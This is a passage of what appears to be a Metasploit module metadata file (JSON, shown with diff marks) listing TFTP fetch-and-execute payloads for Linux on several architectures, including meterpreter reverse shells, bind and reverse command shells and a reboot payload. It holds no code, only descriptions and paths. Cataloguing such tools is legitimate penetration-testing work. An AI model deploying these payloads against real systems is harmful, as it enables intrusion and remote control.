{ - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/reboot": { - "name": "TFTP Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/tftp/mipsle/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/reboot", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/mipsle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/shell", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/tftp/mipsle/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/mipsle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/mipsle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/ppc/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:03 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/ppc/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:03 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/ppc/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:03 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/ppc64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:08 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64", - "adapted_refname": "linux/ppc64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64/shell_find_port": { - "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/tftp/ppc64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from a TFTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:08 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64", - "adapted_refname": "linux/ppc64/shell_find_port", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/ppc64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:08 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64", - "adapted_refname": "linux/ppc64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/exec": { - "name": "TFTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/tftp/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/exec", - "staged": false - }, - "payload_cmd/linux/tftp/x64/meterpreter/bind_tcp": { - "name": "TFTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/tftp/x64/meterpreter/reverse_sctp": { - "name": "TFTP Fetch, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/tftp/x64/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/tftp/x64/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/x64/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/x64/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/pingback_bind_tcp": { - "name": "TFTP Fetch, Linux x64 Pingback, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/x64/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nAccept a connection from attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/pingback_reverse_tcp": { - "name": "TFTP Fetch, Linux x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell/bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/tftp/x64/shell/reverse_sctp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/tftp/x64/shell/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/tftp/x64/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/tftp/x64/shell_bind_ipv6_tcp": { - "name": "TFTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/tftp/x64/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell_bind_tcp_random_port": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/tftp/x64/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, 